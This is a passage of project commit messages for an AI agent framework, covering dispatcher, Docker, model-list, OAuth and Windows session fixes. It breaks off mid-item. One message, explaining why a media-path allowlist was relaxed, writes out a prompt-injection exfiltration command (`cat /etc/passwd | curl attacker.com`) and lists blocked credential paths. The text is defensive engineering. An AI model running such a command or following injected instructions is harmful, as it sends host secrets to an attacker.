Remove unused imports (F401) and duplicate/shadowed import
redefinitions (F811) across the codebase using ruff's safe
autofixes. No behavioral changes -- imports only.
- ~1400 safe autofixes applied across 644 files (net -1072 lines)
- __init__.py re-exports preserved (excluded from F401 removal so
public re-export surfaces stay intact)
- Re-exports that are imported or monkeypatched by tests but look
unused in their defining module are kept with explicit # noqa:
F401 (gateway/run.py load_dotenv; run_agent re-exports from
agent.message_sanitization, agent.context_compressor,
agent.retry_utils, agent.prompt_builder, agent.process_bootstrap,
agent.codex_responses_adapter)
- Unsafe F841 (unused-variable) fixes deliberately skipped -- those
can change behavior when the RHS has side effects
- ruff lints remain disabled in pyproject.toml (only PLW1514 is
selected); this is a one-time cleanup, not a config change
Verification:
- python -m compileall: clean
- pytest --collect-only: all 27161 tests collect (zero import errors)
- core entry points import clean (run_agent, model_tools, cli,
toolsets, hermes_state, batch_runner, gateway)
- static scan: every name any test imports directly from an edited
module still resolves
* fix(codex): surface error code in Responses 'failed' status errors
When a Codex Responses turn ends with status=failed, the response carries
the failure details under `response.error` as
`{code, message, param, ...}`. The previous extractor pulled only
`message`, so users seeing a rate-limit failure got a bare "Slow down"
string indistinguishable from a generic stream truncation; an
internal_error with empty message degraded to a dict dump
("{'code': 'internal_error', 'message': ''}").
Extract a `_format_responses_error()` helper that:
- prefixes `code` when both code and message are present
(e.g. 'rate_limit_exceeded: Slow down')
- falls back to the bare `code` when message is empty
- accepts both dict and attribute-style payloads (SDK and JSON-RPC paths)
- preserves the prior status-only fallback when no error payload exists
Apply the same helper at the sibling site in
`codex_app_server_session.run_turn()` so codex-CLI subprocess turn
failures get the same treatment.
Tests:
- 8 new unit tests for `_format_responses_error` covering both shapes,
empty/missing fields, non-string fields, and the status-only fallback.
- 2 regression tests on `_normalize_codex_response` for failed status
with and without a code, asserting the exact RuntimeError message.
- All 3603 tests in tests/agent/ pass.
Adapted from anomalyco/opencode#28757.
* feat(prompt): universal task-completion guidance + local Python toolchain probe
Two cross-model failure modes get a single-line answer in the cached
system prompt. Both gated by config (default on), both add zero overhead
when not needed, both verified via real AIAgent prompt builds.
## What changed
`TASK_COMPLETION_GUIDANCE` — short prompt block applied to ALL models.
Targets two failure modes observed on a real Sarasota real-estate build
task: (1) Opus stopped after writing an 85-byte stub and gave a prose
response with finish_reason=stop on call #3 of 90; (2) DeepSeek pushed
through a PEP-668 wall, then returned fabricated listings instead of
admitting the blocker. Both behaviors are model-family-agnostic, so the
guidance lives outside the existing tool_use_enforcement gate (~192
tokens, paid once per session via prefix cache).
`tools/env_probe.py` — local Python toolchain probe. Detects
python3/pip/uv/PEP-668 state and emits ONE short line in the system
prompt when something is non-default. Emits NOTHING when the env is
clean (zero token cost for normal users). Skipped entirely for remote
terminal backends (docker/modal/ssh) — they have their own probe.
Example output on a broken environment (the actual case):
Python toolchain: python3=3.11.15 (no pip module),
python=missing (use python3), pip→python3.12 (mismatch),
PEP 668=yes (use venv or uv).
## Config
Both flags live under `agent.` in config.yaml, default True:
agent:
task_completion_guidance: true # universal "finish the job" block
environment_probe: true # local Python toolchain hints
Neither addition required a `_config_version` bump — deep-merge fills
defaults in for existing user configs.
## Validation
| Test surface | Result |
|---|---|
| tests/tools/test_env_probe.py | 10/10 pass (probe unit) |
| tests/run_agent/test_run_agent.py — new classes | 8/8 pass (integration) |
| TestToolUseEnforcementConfig | 17/17 pass (no regression) |
| TestBuildSystemPrompt | 9/9 pass (no regression) |
| TestInvalidateSystemPrompt | 2/2 pass (no regression) |
| tests/agent/test_prompt_builder.py | 124/124 pass (no regression) |
| tests/hermes_cli/ | 5662/5662 pass (config defaults) |
| E2E AIAgent build (broken env) | Both blocks present, 2,178 chars |
| E2E AIAgent build (clean env) | 771-char net overhead, env probe silent |
Two small bugs in the kanban dispatcher's CLI surface that were
silently degrading two distinct workflows. Bundled because the test
files and the surrounding code surface overlap.
## #33488: hermes kanban dispatch ignored kanban.max_in_progress / max_spawn
The CLI wrapper in hermes_cli/kanban.py:_cmd_dispatch only passed
default_assignee and max_in_progress_per_profile through to
dispatch_once. The global concurrency cap (kanban.max_in_progress)
and the per-tick spawn limit (kanban.max_spawn) were silently dropped,
so operators using 'hermes kanban dispatch' as a one-shot or in a
custom loop couldn't reach either cap from config — only the gateway
embedded dispatcher honored them.
Fix: read both keys from config in the same coerce-positive-int
helper that already handled max_in_progress_per_profile. CLI --max
still wins over config kanban.max_spawn when both are present
(explicit operator signal beats default), but absent --max falls
back to config.
## #29415: synthesizer crashed in retry loop on missing skill
hermes_cli/kanban_swarm.py:212 hardcoded skills=['avoid-ai-writing'],
a skill that doesn't exist in the bundled skills/ directory or any
registered hub source. Every synthesizer worker spawn failed at CLI
startup with 'Unknown skill(s): avoid-ai-writing' before the agent
loop even started — the dispatcher retried up to failure_limit
(default 2), then auto-blocked the task, then dependency rules could
re-promote it, looping forever until manual intervention.
Fix: replace with 'humanizer' which is bundled at
skills/creative/humanizer/SKILL.md (description: 'Humanize text:
strip AI-isms and add real voice'). That's the obvious intent behind
the 'avoid-ai-writing' name, and the skill is platform-portable
(linux/macos/windows) so it works on every supported runtime.
## Tests
tests/hermes_cli/test_kanban_cli_dispatch_passthrough.py — 4 cases:
- CLI passes max_in_progress / max_spawn / default_assignee /
max_in_progress_per_profile from config to dispatch_once
- CLI --max flag overrides config kanban.max_spawn
- Invalid cap values (0, -1, 'abc', '1.5') silently fall through to None
- kanban_swarm.py no longer references 'avoid-ai-writing' AND the
replacement 'humanizer' skill exists at the expected on-disk path
Kanban suite: 468/468 pass (was 464; +4 new regression tests).
Two parallel public-path allowlists drifted: _PUBLIC_API_PATHS in
hermes_cli/web_server.py (legacy _SESSION_TOKEN middleware) and
_GATE_PUBLIC_PREFIXES in hermes_cli/dashboard_auth/middleware.py
(OAuth gate). The legacy list included /api/status (documented as a
non-sensitive read-only liveness target); the OAuth gate's list did not.
Effect: every wildcard-subdomain agent surfaced as STARTING/down to the
portal even though the dashboard was serving correctly. Nous account
service (src/server/agents/fly-provider.ts
getInstanceRuntimeStatus) fetches ``/api/status`` without a cookie
as its sole liveness probe; the OAuth gate's 401 looked identical to
'agent dead' on the portal side.
Fix: lift the allowlist into hermes_cli/dashboard_auth/public_paths.py
and have both middlewares import it. _path_is_public now consults
the shared frozenset first, then falls back to the gate's
auth-bootstrap/static prefix list. Future additions to the public list
hit both gates automatically.
Endpoint inventory (verified safe to remain public):
* /api/status — version, gateway state, active session count,
auth-gate shape. Portal liveness probe target.
* /api/config/defaults — config-defaults feed for the SPA's Config page
* /api/config/schema — config schema for the SPA's Config page
* /api/model/info — model catalogue metadata (context windows)
* /api/dashboard/themes — theme manifests for the skin engine
* /api/dashboard/plugins — plugin manifests for the dashboard
No user data, no session content, no secrets. Same shape an external
monitoring agent would hit on /healthz.
Tests:
* New: test_gated_status_is_public (regression guard with the NAS
fly-provider.ts liveness-probe rationale spelled out in the docstring)
* New: test_other_public_api_paths_are_public_under_gate (parametrised
over the rest of PUBLIC_API_PATHS — proves 401 / 302-to-login is
never the response)
* New: docker integration check #3 in
test_dashboard_oauth_gate_engaged_by_default — /api/status
remains 200 under the gate AND reports auth_required=True so the
portal can distinguish modes
* Updated: test_full_login_round_trip_unlocks_gated_api now probes
/api/sessions instead of /api/status (status is public, so it
can no longer distinguish 'logged in' from 'gate accidentally
disabled')
* Updated: TestApi401Envelope (the no-cookie / invalid-cookie /
dead-cookie tests) probes /api/sessions for the same reason
* Updated: docker integration check #2 in
test_dashboard_oauth_gate_engaged_by_default probes
/api/sessions to prove the gate is intercepting
* Removed: dead _login() helper in
test_dashboard_auth_status_endpoint.py (no longer needed since
/api/status is reachable cold)
Companion to docs/handover/hermes-agent-dashboard-s6-insecure-fix.md
(the --insecure flag fix that shipped earlier).
Two related dispatcher behaviors that have been missing for a while.
## kanban.default_assignee (#27145)
Reporter (@agarzon): dashboard creates a task without an assignee, task
parks in 'ready' forever even though the operator's intent ('default')
is perfectly clear. The dispatcher already had a 'skipped_unassigned'
bucket but no fallback routing — users had to manually type 'default'
in the assignee field every time.
Behavior: when 'kanban.default_assignee' is set in config.yaml, the
dispatcher applies that assignee to any unassigned ready task before
deciding whether to spawn. The row is mutated (assignee column + an
'assigned' event with source='kanban.default_assignee' for the audit
trail). Empty/whitespace config value = no fallback, preserving the
existing skipped_unassigned behavior.
Dry-run mode reports what WOULD happen via the new
'auto_assigned_default' bucket on DispatchResult, but does NOT mutate
the DB — operators using 'hermes kanban dispatch --dry-run' see the
routing decision before committing.
## kanban.max_in_progress_per_profile (#21582)
Reporter (@edwardchenchen, @simlu, 4 reactions): fan-out workloads
saturate one profile's local model / API quota / browser pool while
other profiles sit idle. The existing global 'max_in_progress' caps
total workers but doesn't balance across profiles.
Behavior: when 'kanban.max_in_progress_per_profile' is set to a
positive int, the dispatcher tracks per-assignee running counts (one
query at tick start) and refuses to spawn for any assignee already at
the cap. Tasks blocked this way go to a new
'skipped_per_profile_capped' bucket on DispatchResult as
(task_id, assignee, current_running_count) tuples — NOT an
operator-actionable failure, just 'try again next tick when the
profile has capacity'.
Pre-existing 'running' tasks count against the cap (verified via
regression test). The cap respects dry_run mode by incrementing
its in-memory counter on each would-be spawn so dry_run reports
the same balanced subset that a real tick would.
Invalid cap values (0, negative, non-int, None) are treated as 'no
cap', preserving the existing behavior. Backward-compatible for
installs that don't set the config.
## Surfaces
- 'hermes kanban dispatch' CLI now prints 'Auto-assigned to
kanban.default_assignee=X: ...' and 'Deferred (X at per-profile cap,
N running): ...' lines, plus matching JSON keys in --json output.
- Gateway dispatcher logs the configured values at startup
('default_assignee=X', 'max_in_progress_per_profile=N').
- 'kanban.max_in_progress_per_profile' added to DEFAULT_CONFIG with
inline docs.
## Validation
- tests/hermes_cli/test_kanban_default_assignee.py (6 cases): no-cap
baseline, auto-assign + DB mutation, dry-run reports without
mutating, whitespace treated as None, explicit assignees untouched,
DispatchResult field schema.
- tests/hermes_cli/test_kanban_per_profile_cap.py (9 cases including
4 parametrized): no-cap baseline, balanced 2-profile fan-out,
pre-existing running counts against cap, invalid cap values
(0/-1/'abc'/None), capped tasks dispatched on next tick after
running task completes, DispatchResult field schema.
- Broader kanban suite: 464/464 pass (was 449 baseline; +15 new
regression tests across both features).
## Credit
#27145 — Jimmy Johansson reported the dispatcher skipped-unassigned
gap; @agarzon scoped the simpler 'honor kanban.default_assignee' fix
that matches the existing config knob.
#21582 — @edwardchenchen filed the per-profile cap ask after hitting
model 429s on fan-out research projects; @simlu confirmed the same
pain on local-model setups.
The cleanup-fix in the previous commit handles the graceful-exit leak: a
Hermes process that runs ``atexit`` will now actually wait on the docker
stop/rm worker thread, so containers either survive (persist mode) or are
fully removed (opt-out mode) by the time the interpreter exits.
But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window
close. Containers from those exits stay parked with no surviving Python
process to reuse or remove them, so they accumulate until the operator
intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class
— there's no live cleanup() to fix.
This commit adds the safety net: a startup orphan reaper that runs once
per Hermes process and removes long-Exited hermes-labeled containers
that the prior commit couldn't reach.
Implementation:
* New ``reap_orphan_containers()`` in ``tools/environments/docker.py``.
Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional)
``label=hermes-profile=<current>``. Per-container ``docker inspect``
parses ``State.FinishedAt`` (with nanosecond-precision trimming for
Python's microsecond-bound ``fromisoformat``); containers older than
the threshold get ``docker rm -f``'d. The ``status=exited`` filter is
load-bearing — a running container may belong to a sibling Hermes
process whose reuse path will pick it up; killing it would crash the
sibling mid-command. Single-container failures are logged and the
sweep continues to the next candidate.
* New ``_maybe_reap_docker_orphans()`` helper in
``tools/terminal_tool.py``. Wired into ``_create_environment()`` for
``env_type == "docker"``. Gated by:
- ``terminal.docker_orphan_reaper: true`` (default; opt-out for
operators running multiple Hermes processes in the same profile
who don't trust the conservative defaults)
- ``_docker_orphan_reaper_ran`` module flag with double-checked
locking — parallel subagents and RL rollouts don't trigger N
concurrent docker ps storms
- Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor
(so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own
setup)
- Profile scoping — a research profile NEVER reaps the default
profile's stragglers
- Exception swallow — a janitor failure must never block container
creation
* New config ``terminal.docker_orphan_reaper`` wired through all four
config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py,
tests/conftest.py) and pinned by
``test_docker_orphan_reaper_is_bridged_everywhere``.
Coverage:
* 9 new unit tests in test_docker_environment.py — happy path, recent-
container sparing, profile scoping, unparseable-timestamp safety,
docker-ps-failure handling, partial-failure continuation, nanosecond
timestamp parsing, zero-value FinishedAt rejection.
* 6 new integration tests in test_docker_orphan_reaper_integration.py
— once-per-process gate, disable-flag respected, lifetime doubling
with 60s floor, current-profile filter wiring, exception swallow.
* 1 new bridge-invariant regression test.
Closes#20561 (combined with the two prior commits on this branch).
The Docker backend docs claim "Single persistent container — ONE long-
lived container shared across sessions, /new, /reset, and delegate_task
subagents. Stopped/removed on shutdown." In practice the code only
honored that contract within a single Python process via the in-memory
\`_active_environments[task_id]\` cache. Every \`hermes chat\` invocation
spawned a fresh \`hermes-<hex>\` container; older containers piled up in
\`Exited\` state and accumulated until manual \`docker rm\` (issue #20561).
Three root causes, all addressed by this commit:
1. No cross-process container discovery.
2. \`cleanup()\` used fire-and-forget \`subprocess.Popen("... &", shell=True)\`
which raced with parent-process exit — when Python exited promptly the
detached shell child got killed mid-\`docker stop\`, leaving stopped
containers behind.
3. The \`docker rm\` step in cleanup was gated on \`not self._persistent\`
(the bind-mount-persistence flag). Default config sets
\`container_persistent: true\`, so the default happy path skipped \`rm\`
entirely — even when the user explicitly didn't want cross-process
reuse, containers leaked.
Fix:
* Add \`DockerEnvironment.__init__(persist_across_processes=True)\`. When
true, init probes
\`docker ps -a --filter label=hermes-agent=1
--filter label=hermes-task-id=<task>
--filter label=hermes-profile=<profile>\`
and reuses a matching container (running → attach; stopped →
\`docker start\` → attach; \`docker start\` failure → fall through to a
fresh \`docker run\`). Multiple matches prefer the running one, with the
stragglers left for the orphan reaper (next commit) to clean up.
* Rewrite \`cleanup()\`. Uses \`subprocess.run(..., timeout=30)\` on a
daemon \`threading.Thread\`, not the racy \`Popen(... &)\`. The
\`_persistent\` guard is dropped on the \`rm\` step — \`rm\` now runs
whenever \`persist_across_processes\` is false, regardless of the
bind-mount-persistence setting. The leak class is gone in all
combinations.
* Add \`wait_for_cleanup(timeout)\`. \`tools/terminal_tool.py\`'s atexit
hook calls this on every active env, blocking up to 15s for the
cleanup thread before interpreter exit. Without this, \`hermes /quit\`
raced the daemon-thread teardown and dropped the stop/rm work.
* New config \`terminal.docker_persist_across_processes\` (default
\`true\` — restores the documented contract). Set \`false\` for hard
per-process isolation. Wired through all four config-bridge sites
(cli.py env_mappings, gateway/run.py _terminal_env_map,
hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip
list); regression-pinned by
\`test_docker_persist_across_processes_is_bridged_everywhere\` matching
the existing pattern for docker_run_as_host_user / docker_env.
Reuse intentionally does NOT compare image / mounts / resources — only
the labels. Operators changing those settings should set
\`docker_persist_across_processes: false\` (or \`docker rm -f\` the
labeled container) to force a fresh start. This keeps the probe cheap
and the failure mode obvious.
Coverage: 12 new unit tests in tests/tools/test_docker_environment.py
covering reuse paths (running, stopped, fallback, opt-out, duplicate
preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm,
no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one
config-bridge regression pin.
Refs #20561
* fix(model picker): unify /model and `hermes model` model lists, add disk cache
The /model slash picker and `hermes model` were drifting apart. /model
read the raw static `OPENROUTER_MODELS` list (31 entries, including 5
that fail at runtime — no tool-call support or absent from live catalog),
while `hermes model` ran the same list through the live OpenRouter
/v1/models tool-support filter and showed 26 valid entries. Same problem
existed for every other authed provider: /model used curated static
lists, `hermes model` used live /v1/models.
Unifies both surfaces on `provider_model_ids()` and adds a generic
disk-cached wrapper so the picker stays snappy.
Changes
- hermes_cli/models.py: new `cached_provider_model_ids()` —
~/.hermes/provider_models_cache.json, 1h TTL, per-provider entries
keyed by credential fingerprint (env vars + OAuth file mtimes).
Stale-data-beats-no-data on transient failures. Pair with
`clear_provider_models_cache(provider=None)`.
- hermes_cli/models.py: `provider_model_ids("nous")` now falls back
to the docs-hosted manifest (not the in-repo snapshot) when the live
Portal /models call fails — preserves the model_catalog regression
guarantee while still going through the unified pathway.
- hermes_cli/model_switch.py: `list_authenticated_providers` routes
sections 1, 2, and 2b through `cached_provider_model_ids(slug)` with
curated fallback when the live fetcher comes up empty.
- hermes_cli/model_switch.py: `parse_model_flags` extended to a
4-tuple, parses `--refresh`.
- cli.py / gateway/run.py / tui_gateway/server.py: updated unpacking;
CLI + gateway wire `--refresh` to `clear_provider_models_cache()`.
- hermes_cli/main.py: `hermes model --refresh` argparse flag.
- hermes_cli/commands.py: `/model` args_hint advertises `--refresh`.
- tests/hermes_cli/test_inventory.py: refresh stale comment.
Live PTY parity verification
- /model → OpenRouter row: `(26 models)` (was 31, with broken entries)
- `hermes model` → OpenRouter: 26 models (unchanged)
- The 5 dropped entries: `pareto-code` (no tool-call support),
`gemini-3-pro-image-preview` (no tool-call support),
`elephant-alpha`, `hy3-preview:free`, `ring-2.6-1t:free` (gone
from OpenRouter's live catalog).
Live PTY timing
- First /model open, empty cache: 4624 ms (full network round trip
across every authed provider)
- Second /model open, warm cache: 51 ms (90× faster)
- `/model --refresh` clears the disk cache and re-fetches.
Cache schema (~/.hermes/provider_models_cache.json, ~3 KB):
{ "anthropic": {"fp": "<sha256:16>", "at": 1748..., "models": [...]},
... }
Targeted tests: tests/hermes_cli/ + gateway model tests + tui_gateway —
5855/5855 pass.
* fix(model picker): use blake2b for cache fingerprint to silence CodeQL
py/weak-sensitive-data-hashing flagged the sha256 call in
_credential_fingerprint() as a high-severity alert because the input
includes env var values whose names contain *_API_KEY / *_TOKEN.
The hash is used solely as a cache-bust identity — never reversed, never
stored, collisions are harmless (worst case: cache miss → live re-fetch).
blake2b serves the same purpose and isn't flagged by this rule.
Functional behavior identical: 16-hex-char digest, cache hit/miss logic
unchanged. Live re-verified — 26 OpenRouter models, warm-cache 78ms.
PR #29523 restricted MEDIA: paths and bare local paths in agent output to
files under the Hermes media cache or an operator-allowlisted root, with
a 10-minute recency window as a fallback. The intent was to defend
against prompt-injection-driven exfiltration of host secrets, but in the
default single-user setup the asymmetry doesn't earn its keep: we accept
any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...)
and the agent already has terminal access — anything that can convince
it to emit a MEDIA: tag for /etc/passwd can equally convince it to
`cat /etc/passwd | curl attacker.com`.
Practical breakage: agents that produced an .md, .pdf, or other
artifact more than ~10 minutes ago, or outside the cache allowlist,
showed the user a raw filepath in chat instead of the file.
Default flipped to denylist-only:
• /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run}
• $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud}
• macOS Library/Keychains
• $HERMES_HOME/{.env, auth.json, credentials}
The legacy allowlist+recency-window behavior stays available via
opt-in: `gateway.strict: true` in config.yaml (or
`HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots
where prompt injection from one user shouldn't be able to exfiltrate
the host's secrets to that same user.
• `gateway/platforms/base.py` — `validate_media_delivery_path()`
short-circuits to "return resolved if not under denylist" when
strict is off. Strict mode preserves the original cache-then-
allowlist-then-recency logic. New `_media_delivery_strict_mode()`
reader for `HERMES_MEDIA_DELIVERY_STRICT`.
• `hermes_cli/config.py` — `gateway.strict: false` added to
DEFAULT_CONFIG; existing keys documented as "only consulted in
strict mode." No `_config_version` bump needed (deep-merge picks
up the new default for old installs).
• `gateway/run.py` — bridges `gateway.strict` →
`HERMES_MEDIA_DELIVERY_STRICT` at startup.
• `tools/send_message_tool.py` — schema description broadened back
to plain "any local path."
• Tests — existing strict-path tests pinned to STRICT=1 so they keep
exercising the legacy behavior; new `TestMediaDeliveryDefaultMode`
with 8 cases covering the public default (stale .md accepted, any
extension delivers, credential paths still blocked, strict env-var
aliases, filter E2E).
Validation:
- tests/gateway/test_platform_base.py: 119/119 pass
- tests/gateway/test_tts_media_routing.py: 7/7 pass
- tests/tools/test_send_message_tool.py: 121/121 pass
- tests/hermes_cli/test_kanban_notify.py: 12/12 pass
- tests/cron/test_scheduler.py: 120/120 pass
- E2E via execute_code with real imports:
• stale .md outside allowlist → accepted (default)
• same path with STRICT=1 → rejected
• $HOME/.ssh/id_rsa → rejected (default)
• filter_local_delivery_paths([md, key]) → [md] only
• gateway.strict in config.yaml → bridged to env (true=1, false=0)
Anthropic released Claude Opus 4.8 on 2026-05-27, available on
OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS:
- https://openrouter.ai/anthropic/claude-opus-4.8
- https://openrouter.ai/anthropic/claude-opus-4.8-fast
The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast)
priced at 2x of the base model — a notable improvement over the 6x premium
on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request
parameter like Opus 4.6; Anthropic's native fast-mode beta still only
covers Opus 4.6.
Changes:
hermes_cli/models.py
- Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to
the OpenRouter fallback snapshot and the Nous Portal curated list
(live catalogs surface them automatically when reachable; the
fallback list matters when the manifest fetch fails).
- Add claude-opus-4-8 to the Anthropic-native picker list.
agent/model_metadata.py
- Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS
with 1M tokens (matches 4.6/4.7).
agent/anthropic_adapter.py
- Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and
_NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the
Opus 4.7 API contract: adaptive thinking only, xhigh effort level
supported, sampling parameters (temperature/top_p/top_k) return 400.
- Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output,
same as 4.7). Matches by substring so claude-opus-4-8-fast and
date-stamped variants resolve correctly.
agent/usage_pricing.py
- Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50
cache read, $6.25 cache write (same as 4.6/4.7).
- Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00
cache read, $12.50 cache write. Per OpenRouter, the 2x premium is
the only differentiator from regular Opus 4.8.
- OpenRouter routes still pull pricing from the live /models API, so
no static OpenRouter entry is needed.
tests/agent/test_model_metadata.py
- Extend the Claude 4.6+ context-length tag list with 4.8/4-8.
website/static/api/model-catalog.json
- Regenerated via `python scripts/build_model_catalog.py` to pick up
the new entries in the OpenRouter and Nous Portal fallback lists.
E2E verification (isolated sys.path import against the worktree):
- _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params
all return True for claude-opus-4.8 and claude-opus-4.8-fast.
- _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays
False for 4.8 — fast mode is a separate model ID on OpenRouter, not a
parameter Anthropic accepts on the base model.
- DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations.
- resolve_billing_route + _lookup_official_docs_pricing resolve the
correct $5/$25 (regular) and $10/$50 (fast) pricing for both
dot-notation and dash-notation inputs.
- 4.7 and 4.6 regression: behavior unchanged.
Unit tests: 305 passed across tests/agent/test_usage_pricing.py,
test_model_metadata.py, tests/hermes_cli/test_model_catalog.py,
test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py.
xAI's consent page renders the authorization code in-page rather than
redirecting through the 127.0.0.1 callback, so on remote/headless setups
(GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only
value the user can paste is the opaque code with no `code=`/`state=`
query parameters. `_parse_pasted_callback` correctly returns
`state=None` for that input, but `_xai_oauth_loopback_login` then
validated state unconditionally and raised `xai_state_mismatch`,
making the documented bare-code paste path unreachable.
PKCE (code_verifier) still binds the token exchange to this client,
so the local state-equality check is redundant when there is no state
to compare. On the manual-paste path only, substitute the locally
generated state when the callback returned none — the rest of the
validation chain (code presence, error field, token exchange) is
unchanged. The loopback HTTP-server path still requires a matching
state (a real browser redirect always carries one).
Also: clarify the manual-paste prompt to mention xAI's in-page code
rendering so users know pasting the bare code on its own is expected.
Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20).
Tests
-----
* test_xai_loopback_login_manual_paste_bare_code_succeeds — positive
end-to-end through the token exchange with state=None.
* test_xai_loopback_login_loopback_path_rejects_missing_state — the
HTTP-server path still rejects state=None as a regression guard
(the bare-code relaxation must NOT widen the loopback path).
* Existing test_xai_loopback_login_manual_paste_state_mismatch_raises
continues to verify wrong (non-None) state is rejected on manual-paste.
Closes#26923.
`hermes skills search` rendered the Identifier column with the default
overflow behaviour, so long slugs (notably browse-sh — every browse-sh
skill ends in a `-XXXXXX` hash that's part of the identifier) were cut
to `browse-sh/weathe…`. Users copied the visible string into
`hermes skills install` and got a not-found error because the hash was
gone.
Set overflow="fold" on the Identifier column in both search tables
(`do_search` and the `_resolve_short_name` multi-match table) so long
slugs wrap onto a second line instead of getting eaten. Also add a
`--json` flag to `hermes skills search` (and the `/skills search`
slash variant) for scripting — emits a list of {name, identifier,
source, trust_level, description} objects with the full identifier,
which is the right shape for copy-paste pipelines too.
Closes#33674.
The web_crawl_tool() function was an orphan — no model schema registered
it, no skill or CLI command called it, and the agent had no way to invoke
it. PR #32608 proposed wiring it up as a model-callable tool; we've
decided not to expose crawl as a separate capability since web_search +
web_extract cover the use cases we want models to have.
Removed:
- tools/web_tools.py: web_crawl_tool() (~230 LOC)
- plugins/web/firecrawl/provider.py: supports_crawl() + crawl()
- plugins/web/tavily/provider.py: supports_crawl() + crawl()
- plugins/web/xai/provider.py: supports_crawl() override
- agent/web_search_provider.py: supports_crawl() + crawl() ABC methods
- agent/web_search_registry.py: get_active_crawl_provider() +
the 'crawl' branch in _resolve()
- agent/display.py: web_crawl tool-progress rendering
- hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools
- tools/website_policy.py: stale comment reference
- Tests: removed TestWebCrawlTavily class, the two website-policy
web_crawl tests, the searxng/ddgs/brave-free crawl-error tests,
the integration test_web_crawl method, and the
test_unconfigured_crawl_emits_top_level_error test. Trimmed the
capability-flag parametrize list and the WebSearchProvider ABC
conformance tests.
- Docs: trimmed the Crawl column from capability tables in both EN
and zh-Hans, updated the developer-guide ABC table.
Net: 25 files, +115/-1067.
Closes#33762 (the schema-text bug only existed if #32608 landed).
Supersedes #32608.
Repeated quarantines of an unchanged corrupt kanban.db used to amplify
disk usage by N: the gateway dispatcher's 5-minute retry loop, multi-
profile fleets sharing one DB, and manual reopen attempts each produced
a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10
retries on a 100KB DB you had 11x the disk footprint of duplicate
corrupt data.
Derive the backup filename from a sha256 of the main DB instead of a
timestamp + collision counter. Same bytes → same filename → skip the
copy on retries. Different bytes (partial repair, further damage) →
different filename → preserve separately. Sidecar (-wal/-shm) backups
inherit the same content-addressed name.
Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop
the persistent JSON marker file, drop the atomic temp+fsync+rename
helper (shutil.copy2 is fine for a quarantine-only path), drop the
gateway-side WAL/SHM fingerprint extension (the existing
(path, mtime, size) tuple still gives the 5-minute retry semantics it
needs), and drop the gateway-side helper extraction. The backup file
existing IS the marker; no separate state needed.
Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup
proves 10 retries on the same corrupt bytes produce 1 backup (was 11),
and mutating the corrupt bytes produces a second backup with a
different fingerprint.
Refs #33529
Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de>
`hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands *after* `pip install -e .` has already touched the install but *before* the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384).
Changes:
- New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update.
- `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract.
- Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step.
Tests:
- `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests.
- `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step.
- `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update.
Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed.
Fixes#33788.
Sessions now survive `hermes gateway stop` / `restart` on native Windows.
Previously the gateway died on schtasks `/End` + os.kill SIGTERM without
ever running the drain loop, so the v0.13.0 session-resume feature (#21192)
silently broke on Windows: `resume_pending=True` was never written, and
the next boot started with a blank conversation history (issue #33778).
Root cause is twofold and the reporter only identified half of it:
1. `hermes_cli/gateway_windows.py::stop()` did not write the
`planned_stop_marker` before signalling. The reporter caught this.
